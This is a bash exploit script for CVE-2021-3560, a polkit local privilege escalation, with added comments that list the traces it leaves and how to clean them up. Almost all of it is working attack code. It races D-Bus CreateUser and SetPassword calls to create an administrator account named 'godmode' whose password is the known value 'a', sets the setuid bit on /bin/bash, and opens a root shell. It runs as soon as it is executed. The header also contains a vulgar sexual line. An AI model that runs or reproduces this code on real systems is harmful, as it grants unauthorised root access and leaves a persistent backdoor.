#!/bin/bash
# Exploit by: Marshall Whittaker / oxagast
# oxagast@oxasploits.com
# Discovery by: Kevin Backhouse
# Polkit 0.113 - 0.118 LPE via Race Condition
# CVE-2021-3560
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/
# Note: afterwards you need to manually remove the godmode user,
# run chmod a-s /bin/bash, and rm /tmp/oneup.sh; until that is done
# /bin/bash stays setuid and the godmode account remains on the system.
# My neck, my back lick it lick my pussy and my crack.
#
# [marshall@jerkon CVE-2021-3560]$ ./polkit_godmode_0day.sh
# Password:
# [sudo] password for godmode: bash-5.1#
# bash-5.1# id; whoami;uname -a;
# uid=1000(marshall) gid=1000(marshall) euid=0(root) egid=0(root) groups=0(root),998(wheel),1000(marshall)
# root
# Linux jerkon.oxagast.org 5.10.41-1-MANJARO #1 SMP PREEMPT Fri May 28 19:10:32 UTC 2021 x86_64 GNU/Linux
# bash-5.1#
# sploit: attempt loop for the polkit race named in the header (CVE-2021-3560).
# Takes no arguments. It talks to the system D-Bus service
# org.freedesktop.Accounts and, if an attempt succeeds, hands off to spawn.
#
# Artifacts this function leaves on a host (useful as indicators when
# triaging a system where the script was run):
#   - a local account named "godmode" in /etc/passwd
#   - the file /tmp/oneup.sh, world-executable
#   - the setuid/setgid bits set on /bin/bash
#   - bursts of CreateUser / SetPassword method calls on the system bus from
#     dbus-send clients that are killed a few milliseconds after starting
# Remediation is outside this script: update polkit to a release newer than
# the affected range listed in the header, then remove the artifacts above.
function sploit {
# Outer loop: five attempts, each with a different client lifetime.
for wait in {1..5}; do
# SHA-256 crypt hash (-5) of the fixed one-character password "a"; the account
# created below therefore has a publicly known password until it is removed.
P=$(openssl passwd -5 a);
# Sleep duration string built from the outer counter (0.001s .. 0.005s).
W=$(printf "0.00"$wait"s")
# Inner loop: 26 back-to-back tries at the current delay.
for race in {0..25}; do
# Ask AccountsService to create user "godmode" (real name "gg"); the client is
# backgrounded and killed after $W, errors are discarded.
# NOTE(review): int32:1 is the account-type argument; presumably the
# administrator type, consistent with the sudo prompt in the header - confirm.
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:godmode string:"gg" int32:1 2>/dev/null & sleep $W ; kill $! 2>/dev/null
# Read the third field (UID) of any /etc/passwd line containing "godmode";
# empty if the account does not exist yet.
ID=$(cat /etc/passwd | grep godmode | cut -d ':' -f 3 | tr -d '\n');
# Same kill-after-$W pattern against the per-user object User$ID, calling
# SetPassword with the hash in $P; "god" is the second string argument
# (presumably the password hint - confirm against the AccountsService API).
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$ID org.freedesktop.Accounts.User.SetPassword string:$P string:god 2>/dev/null & sleep $W ; kill $! 2>/dev/null
done;
sleep 0.5;
# Write a one-line helper to a fixed path in /tmp: it pipes the password "a"
# to sudo -S and sets the setuid/setgid bits on /bin/bash. The change to
# /bin/bash is system-wide and persists after the script exits.
echo 'echo a | sudo -S chmod a+s /bin/bash' > /tmp/oneup.sh;
chmod a+x /tmp/oneup.sh;
# Run the helper as godmode via su under a socat pty, feeding "a" as the su
# password after one second; spawn is called only if the socat pipeline
# returns success.
(sleep 1; echo a) | socat - EXEC:'su godmode -c /tmp/oneup.sh',pty && spawn
done
}
# spawn: runs only when /bin/bash carries the setuid bit. Takes no arguments.
# A setuid /bin/bash is itself the indicator to look for on a host: it stays
# in place for every local user until the bit is cleared (see the cleanup
# note in the file header).
function spawn {
# -u is true when the file exists and has its set-user-ID bit set.
if [ -u /bin/bash ]; then
# Cosmetic: carriage return plus tabs before the shell prompt appears.
printf "\r\t\t\t"
# -p keeps the effective uid/gid instead of resetting them to the real ids.
/bin/bash -p;
# mortalize.sh is not part of this file; presumably a cleanup step run from
# the current directory after the interactive shell exits - confirm.
/bin/bash -p ./mortalize.sh
# NOTE(review): $? is the exit status of the previous command, not a process
# id, so this kill does not target a known process.
kill $?
fi;
}
# Entry point: the attempt loop starts as soon as the script is executed;
# there is no argument parsing or confirmation step.
sploit;